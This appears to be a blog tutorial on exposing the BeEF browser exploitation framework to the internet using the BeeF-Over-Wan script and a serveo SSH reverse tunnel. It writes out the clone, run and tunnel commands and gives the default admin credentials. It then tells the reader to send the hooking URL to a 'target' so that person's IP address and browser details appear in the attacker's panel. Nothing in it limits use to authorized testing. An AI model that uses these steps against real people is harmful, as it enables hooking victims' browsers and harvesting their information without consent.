BeEF – Browser Exploitation Framework Over WPN (Without Port Forwarding)


Beef

Beef Xss Framework is a browser exploitation tool. It mainly focuses on client-side attacks and web-based browsers. It helps a penetration tester to understand past the network perimeter and client system. Its available in Kali Linux and other penetration testing operating systems by Default.

Source:gbhackers

Prerequisites – Beef Xss Framework

  1. Ngrok  or Serveo
  2. Beef Over Wan 
  3. KALI LINUX

You can use ngrok or serveo, however, ngrok doesn’t allow running multiple tunnels in the free version. so we will go with serveo. Scroll down for the video on ngrok.

Step 1 :
Boot up Kali Linux and download beef over wan by typing in the terminal

git clone https://github.com/stormshadow07/BeeF-Over-Wan.git

Step 2 :

Now navigate into the directory by typing the commands.

cd BeeF-Over-Wan

chmod +x BeeFOverWan.py && python BeeFOverWan.py

type 1 & press enter

Beef

Step 3 :

open a new terminal to run serveo type in the command

 ssh -R 80:localhost:80 -R 8090:localhost:3000 serveo.net 

Beef

make a note here the HTTP traffic URL is to be pasted in the other terminal, where the one pointing to the port 8090 needs to be pasted for the admin interface beef xss framework.

victim link: opposui.serveo.net

admin URL: serveo.net:8090

Step 4 :

Paste the URLs in the other terminal where the beef over wan script is running.

Beef

Step 5 :

Sign in to the admin, Do remember the URL will be different for you guys so make sure you type in the correct one. The default username is beef and password is beef.

Step 6 :

Now pass on the hooking URL to the target, Once the target clicks it. You should be able to see their IP address and browser information in your admin panel.

Here you can see the video demonstration of Beef Xss Framework over WAN.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Blog at WordPress.com.

Up ↑

%d bloggers like this: